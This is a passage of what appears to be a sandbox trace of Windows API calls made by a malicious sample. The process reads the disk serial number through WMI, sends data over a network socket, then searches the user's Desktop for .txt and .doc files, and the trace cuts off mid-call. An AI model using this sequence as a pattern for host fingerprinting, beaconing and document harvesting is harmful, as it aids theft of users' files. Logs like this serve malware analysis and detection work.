WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f2b4*=0x0, pszText=0x0 | out: puBuffLength=0x19f2b4*=0xf, pszText=0x0) returned 0x0 [0260.839] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f2b4*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f2b4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0260.839] CoGetContextToken (in: pToken=0x19f108 | out: pToken=0x19f108) returned 0x0 [0260.839] IUnknown:AddRef (This=0x663528) returned 0x3 [0260.839] IEnumWbemClassObject:Clone (in: This=0x663528, ppEnum=0x19f2c4 | out: ppEnum=0x19f2c4*=0x663848) returned 0x0 [0260.841] IUnknown:QueryInterface (in: This=0x663848, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f188 | out: ppvObject=0x19f188*=0x66384c) returned 0x0 [0260.841] IClientSecurity:QueryBlanket (in: This=0x66384c, pProxy=0x663848, pAuthnSvc=0x19f1d8, pAuthzSvc=0x19f1d4, pServerPrincName=0x19f1cc, pAuthnLevel=0x19f1d0, pImpLevel=0x19f1c0, pAuthInfo=0x19f1c4, pCapabilites=0x19f1c8 | out: pAuthnSvc=0x19f1d8*=0xa, pAuthzSvc=0x19f1d4*=0x0, pServerPrincName=0x19f1cc, pAuthnLevel=0x19f1d0*=0x6, pImpLevel=0x19f1c0*=0x2, pAuthInfo=0x19f1c4, pCapabilites=0x19f1c8*=0x1) returned 0x0 [0260.841] IUnknown:Release (This=0x66384c) returned 0x1 [0260.841] IUnknown:QueryInterface (in: This=0x663848, riid=0x6d3c10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f17c | out: ppvObject=0x19f17c*=0x66eb70) returned 0x0 [0260.841] IUnknown:QueryInterface (in: This=0x663848, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f178 | out: ppvObject=0x19f178*=0x66384c) returned 0x0 [0260.841] IClientSecurity:SetBlanket (This=0x66384c, pProxy=0x663848, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0260.906] IUnknown:Release (This=0x66384c) returned 0x2 [0260.906] WbemLocator:IUnknown:Release (This=0x66eb70) returned 0x1 [0260.906] CoTaskMemFree (pv=0x54bc268) [0260.907] IUnknown:QueryInterface (in: This=0x663848, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed64 | out: ppvObject=0x19ed64*=0x66eb70) returned 0x0 [0260.907] WbemLocator:IUnknown:QueryInterface (in: This=0x66eb70, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ed20 | out: ppvObject=0x19ed20*=0x0) returned 0x80004002 [0260.907] WbemLocator:IUnknown:QueryInterface (in: This=0x66eb70, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19eb3c | out: ppvObject=0x19eb3c*=0x0) returned 0x80004002 [0260.908] IUnknown:QueryInterface (in: This=0x663848, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e914 | out: ppvObject=0x19e914*=0x0) returned 0x80004002 [0260.908] WbemLocator:IUnknown:AddRef (This=0x66eb70) returned 0x3 [0260.908] WbemLocator:IUnknown:QueryInterface (in: This=0x66eb70, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e67c | out: ppvObject=0x19e67c*=0x0) returned 0x80004002 [0260.908] WbemLocator:IUnknown:QueryInterface (in: This=0x66eb70, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e62c | out: ppvObject=0x19e62c*=0x0) returned 0x80004002 [0260.908] WbemLocator:IUnknown:QueryInterface (in: This=0x66eb70, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e638 | out: ppvObject=0x19e638*=0x66eacc) returned 0x0 [0260.909] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x66eacc, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e640 | out: pCid=0x19e640*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0260.909] WbemLocator:IUnknown:Release (This=0x66eacc) returned 0x3 [0260.909] CoGetContextToken (in: pToken=0x19e698 | out: pToken=0x19e698) returned 0x0 [0260.909] CoGetContextToken (in: pToken=0x19eaa0 | out: pToken=0x19eaa0) returned 0x0 [0260.909] WbemLocator:IUnknown:QueryInterface (in: This=0x66eb70, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19eb30 | out: ppvObject=0x19eb30*=0x66eb54) returned 0x0 [0260.909] WbemLocator:IRpcOptions:Query (in: This=0x66eb54, pPrx=0x66eb70, dwProperty=2, pdwValue=0x19eb58 | out: pdwValue=0x19eb58) returned 0x80004002 [0260.909] WbemLocator:IUnknown:Release (This=0x66eb54) returned 0x3 [0260.909] WbemLocator:IUnknown:Release (This=0x66eb70) returned 0x2 [0260.909] CoGetContextToken (in: pToken=0x19f078 | out: pToken=0x19f078) returned 0x0 [0260.909] CoGetContextToken (in: pToken=0x19efd8 | out: pToken=0x19efd8) returned 0x0 [0260.909] WbemLocator:IUnknown:QueryInterface (in: This=0x66eb70, riid=0x19f0a8*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x19f0a4 | out: ppvObject=0x19f0a4*=0x663848) returned 0x0 [0260.909] IUnknown:AddRef (This=0x663848) returned 0x4 [0260.909] IUnknown:Release (This=0x663848) returned 0x3 [0260.909] IUnknown:Release (This=0x663848) returned 0x2 [0260.909] IUnknown:Release (This=0x663528) returned 0x2 [0260.909] SysStringLen (param_1=0x0) returned 0x0 [0260.910] IEnumWbemClassObject:Reset (This=0x663848) returned 0x0 [0260.914] CoTaskMemAlloc (cb=0x4) returned 0x54ba208 [0260.914] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba208, puReturned=0x2236510 | out: apObjects=0x54ba208*=0x54bcc90, puReturned=0x2236510*=0x1) returned 0x0 [0261.087] IUnknown:QueryInterface (in: This=0x54bcc90, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e928 | out: ppvObject=0x19e928*=0x54bcc90) returned 0x0 [0261.088] IUnknown:QueryInterface (in: This=0x54bcc90, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e8e4 | out: ppvObject=0x19e8e4*=0x0) returned 0x80004002 [0261.088] IUnknown:QueryInterface (in: This=0x54bcc90, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e704 | out: ppvObject=0x19e704*=0x0) returned 0x80004002 [0261.088] IUnknown:QueryInterface (in: This=0x54bcc90, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e4dc | out: ppvObject=0x19e4dc*=0x0) returned 0x80004002 [0261.088] IUnknown:AddRef (This=0x54bcc90) returned 0x3 [0261.088] IUnknown:QueryInterface (in: This=0x54bcc90, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e244 | out: ppvObject=0x19e244*=0x0) returned 0x80004002 [0261.088] IUnknown:QueryInterface (in: This=0x54bcc90, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e1f4 | out: ppvObject=0x19e1f4*=0x0) returned 0x80004002 [0261.088] IUnknown:QueryInterface (in: This=0x54bcc90, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e200 | out: ppvObject=0x19e200*=0x54bcc94) returned 0x0 [0261.088] IMarshal:GetUnmarshalClass (in: This=0x54bcc94, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e208 | out: pCid=0x19e208*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0261.088] IUnknown:Release (This=0x54bcc94) returned 0x3 [0261.088] CoGetContextToken (in: pToken=0x19e260 | out: pToken=0x19e260) returned 0x0 [0261.088] CoGetContextToken (in: pToken=0x19e668 | out: pToken=0x19e668) returned 0x0 [0261.089] IUnknown:QueryInterface (in: This=0x54bcc90, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e6f8 | out: ppvObject=0x19e6f8*=0x0) returned 0x80004002 [0261.089] IUnknown:Release (This=0x54bcc90) returned 0x2 [0261.089] CoGetContextToken (in: pToken=0x19ec38 | out: pToken=0x19ec38) returned 0x0 [0261.089] CoGetContextToken (in: pToken=0x19eb98 | out: pToken=0x19eb98) returned 0x0 [0261.089] IUnknown:QueryInterface (in: This=0x54bcc90, riid=0x19ec68*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19ec64 | out: ppvObject=0x19ec64*=0x54bcc90) returned 0x0 [0261.089] IUnknown:AddRef (This=0x54bcc90) returned 0x4 [0261.089] IUnknown:Release (This=0x54bcc90) returned 0x3 [0261.089] IUnknown:Release (This=0x54bcc90) returned 0x2 [0261.089] CoTaskMemFree (pv=0x54ba208) [0261.089] CoGetContextToken (in: pToken=0x19efa0 | out: pToken=0x19efa0) returned 0x0 [0261.089] IUnknown:AddRef (This=0x54bcc90) returned 0x3 [0261.092] IWbemClassObject:Get (in: This=0x54bcc90, wszName="__GENUS", lFlags=0, pVal=0x19f2b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f334*=0, plFlavor=0x19f330*=0 | out: pVal=0x19f2b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f334*=3, plFlavor=0x19f330*=64) returned 0x0 [0261.093] IWbemClassObject:Get (in: This=0x54bcc90, wszName="__PATH", lFlags=0, pVal=0x19f298*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f31c*=0, plFlavor=0x19f318*=0 | out: pVal=0x19f298*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\ROOT\\cimv2:Win32_DiskDrive.DeviceID=\"\\\\\\\\.\\\\PHYSICALDRIVE0\"", varVal2=0x0), pType=0x19f31c*=8, plFlavor=0x19f318*=64) returned 0x0 [0261.095] SysStringByteLen (bstr="\\\\XC64ZB\\ROOT\\cimv2:Win32_DiskDrive.DeviceID=\"\\\\\\\\.\\\\PHYSICALDRIVE0\"") returned 0x88 [0261.095] SysStringByteLen (bstr="\\\\XC64ZB\\ROOT\\cimv2:Win32_DiskDrive.DeviceID=\"\\\\\\\\.\\\\PHYSICALDRIVE0\"") returned 0x88 [0261.095] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f2c4 | out: ppv=0x19f2c4*=0x601a94) returned 0x0 [0261.095] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f2bc | out: pAptType=0x19f2bc*=1) returned 0x0 [0261.095] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f2c0 | out: ppvObject=0x19f2c0*=0x0) returned 0x80004002 [0261.095] IUnknown:Release (This=0x601a94) returned 0x1 [0261.097] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19ec30 | out: ppv=0x19ec30*=0x54ba3a8) returned 0x0 [0261.097] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba3a8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ee48 | out: ppvObject=0x19ee48*=0x0) returned 0x80004002 [0261.097] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba3a8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ee5c | out: ppvObject=0x19ee5c*=0x6614e0) returned 0x0 [0261.097] WbemDefPath:IUnknown:Release (This=0x54ba3a8) returned 0x0 [0261.097] WbemDefPath:IUnknown:QueryInterface (in: This=0x6614e0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ea7c | out: ppvObject=0x19ea7c*=0x6614e0) returned 0x0 [0261.097] WbemDefPath:IUnknown:QueryInterface (in: This=0x6614e0, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ea38 | out: ppvObject=0x19ea38*=0x0) returned 0x80004002 [0261.097] WbemDefPath:IUnknown:QueryInterface (in: This=0x6614e0, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e62c | out: ppvObject=0x19e62c*=0x0) returned 0x80004002 [0261.098] WbemDefPath:IUnknown:AddRef (This=0x6614e0) returned 0x3 [0261.098] WbemDefPath:IUnknown:QueryInterface (in: This=0x6614e0, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e394 | out: ppvObject=0x19e394*=0x0) returned 0x80004002 [0261.098] WbemDefPath:IUnknown:QueryInterface (in: This=0x6614e0, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e344 | out: ppvObject=0x19e344*=0x0) returned 0x80004002 [0261.098] WbemDefPath:IUnknown:QueryInterface (in: This=0x6614e0, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e350 | out: ppvObject=0x19e350*=0x6417d0) returned 0x0 [0261.098] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x6417d0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e358 | out: pCid=0x19e358*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0261.098] WbemDefPath:IUnknown:Release (This=0x6417d0) returned 0x3 [0261.098] CoGetContextToken (in: pToken=0x19e3b0 | out: pToken=0x19e3b0) returned 0x0 [0261.098] CoGetContextToken (in: pToken=0x19e7b8 | out: pToken=0x19e7b8) returned 0x0 [0261.098] WbemDefPath:IUnknown:QueryInterface (in: This=0x6614e0, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e848 | out: ppvObject=0x19e848*=0x0) returned 0x80004002 [0261.098] WbemDefPath:IUnknown:Release (This=0x6614e0) returned 0x2 [0261.098] WbemDefPath:IUnknown:Release (This=0x6614e0) returned 0x1 [0261.098] CoGetContextToken (in: pToken=0x19f140 | out: pToken=0x19f140) returned 0x0 [0261.098] CoGetContextToken (in: pToken=0x19f0a0 | out: pToken=0x19f0a0) returned 0x0 [0261.098] WbemDefPath:IUnknown:QueryInterface (in: This=0x6614e0, riid=0x19f170*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f16c | out: ppvObject=0x19f16c*=0x6614e0) returned 0x0 [0261.098] WbemDefPath:IUnknown:AddRef (This=0x6614e0) returned 0x3 [0261.098] WbemDefPath:IUnknown:Release (This=0x6614e0) returned 0x2 [0261.098] WbemDefPath:IWbemPath:SetText (This=0x6614e0, uMode=0x4, pszPath="\\\\XC64ZB\\ROOT\\cimv2:Win32_DiskDrive.DeviceID=\"\\\\\\\\.\\\\PHYSICALDRIVE0\"") returned 0x0 [0261.099] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f2f0 | out: puCount=0x19f2f0*=0x2) returned 0x0 [0261.099] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f2ec*=0x0, pszText=0x0 | out: puBuffLength=0x19f2ec*=0xf, pszText=0x0) returned 0x0 [0261.099] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f2ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f2ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0261.099] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f2bc | out: puCount=0x19f2bc*=0x2) returned 0x0 [0261.099] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f2b8*=0x0, pszText=0x0 | out: puBuffLength=0x19f2b8*=0xf, pszText=0x0) returned 0x0 [0261.099] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f2b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f2b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0261.099] IWbemClassObject:Get (in: This=0x54bcc90, wszName="SerialNumber", lFlags=0, pVal=0x19f2b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2236dc8*=0, plFlavor=0x2236dcc*=0 | out: pVal=0x19f2b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="L0LFETF515", varVal2=0x0), pType=0x2236dc8*=8, plFlavor=0x2236dcc*=0) returned 0x0 [0261.100] SysStringByteLen (bstr="L0LFETF515") returned 0x14 [0261.100] SysStringByteLen (bstr="L0LFETF515") returned 0x14 [0261.100] IWbemClassObject:Get (in: This=0x54bcc90, wszName="SerialNumber", lFlags=0, pVal=0x19f2c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2236dc8*=8, plFlavor=0x2236dcc*=0 | out: pVal=0x19f2c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="L0LFETF515", varVal2=0x0), pType=0x2236dc8*=8, plFlavor=0x2236dcc*=0) returned 0x0 [0261.100] SysStringByteLen (bstr="L0LFETF515") returned 0x14 [0261.100] SysStringByteLen (bstr="L0LFETF515") returned 0x14 [0261.102] CoGetContextToken (in: pToken=0x19f1f0 | out: pToken=0x19f1f0) returned 0x0 [0261.102] WbemLocator:IUnknown:Release (This=0x66eb70) returned 0x1 [0261.102] IUnknown:Release (This=0x663848) returned 0x0 [0261.103] CoGetContextToken (in: pToken=0x19f1f0 | out: pToken=0x19f1f0) returned 0x0 [0261.103] WbemLocator:IUnknown:Release (This=0x66f870) returned 0x1 [0261.103] IUnknown:Release (This=0x663528) returned 0x0 [0261.133] BCryptGetFipsAlgorithmMode (in: pfEnabled=0x19f358 | out: pfEnabled=0x19f358) returned 0x0 [0261.381] CoCreateGuid (in: pguid=0x19efa4 | out: pguid=0x19efa4*(Data1=0xe3d9ec30, Data2=0xabd9, Data3=0x4944, Data4=([0]=0xac, [1]=0x5, [2]=0x84, [3]=0xa7, [4]=0x67, [5]=0x3f, [6]=0xde, [7]=0x26))) returned 0x0 [0261.382] CoCreateGuid (in: pguid=0x19eed4 | out: pguid=0x19eed4*(Data1=0x4853f277, Data2=0xcd3a, Data3=0x4b5b, Data4=([0]=0xa6, [1]=0x80, [2]=0x34, [3]=0xf1, [4]=0x40, [5]=0x5b, [6]=0xf0, [7]=0xd3))) returned 0x0 [0261.555] send (s=0x348, buf=0x22574d6*, len=741, flags=0) returned 741 [0261.557] recv (in: s=0x348, buf=0x2165550, len=8192, flags=0 | out: buf=0x2165550*) returned 125 [0261.724] CoCreateGuid (in: pguid=0x19efd4 | out: pguid=0x19efd4*(Data1=0x75bc31ca, Data2=0xab43, Data3=0x4ed6, Data4=([0]=0x92, [1]=0x6a, [2]=0x8c, [3]=0xfe, [4]=0x75, [5]=0xd5, [6]=0xcf, [7]=0xbb))) returned 0x0 [0261.724] CoCreateGuid (in: pguid=0x19ef04 | out: pguid=0x19ef04*(Data1=0xaa1f6d0b, Data2=0x7f2, Data3=0x423b, Data4=([0]=0xb2, [1]=0xc0, [2]=0x96, [3]=0xc6, [4]=0xd, [5]=0xa2, [6]=0xd0, [7]=0xc5))) returned 0x0 [0261.725] send (s=0x348, buf=0x225703f*, len=171, flags=0) returned 171 [0261.725] recv (in: s=0x348, buf=0x2165550, len=8192, flags=0 | out: buf=0x2165550*) returned 125 [0261.798] ExpandEnvironmentStringsW (in: lpSrc="%userprofile%", lpDst=0x19f17c, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0261.799] ExpandEnvironmentStringsW (in: lpSrc="%userprofile%\\Desktop", lpDst=0x19f17c, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1e [0262.105] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f224) returned 1 [0262.106] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x105, lpBuffer=0x19ed2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x0) returned 0x1d [0262.107] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", nBufferLength=0x105, lpBuffer=0x19ed00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpFilePart=0x0) returned 0x1e [0262.108] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.txt" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\*.txt"), lpFindFileData=0x19ef4c | out: lpFindFileData=0x19ef4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0262.109] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f1e4) returned 1 [0262.109] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f1f0) returned 1 [0262.121] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f224) returned 1 [0262.121] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x105, lpBuffer=0x19ed2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x0) returned 0x1d [0262.121] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", nBufferLength=0x105, lpBuffer=0x19ed00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpFilePart=0x0) returned 0x1e [0262.121] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.doc*" (normalized: 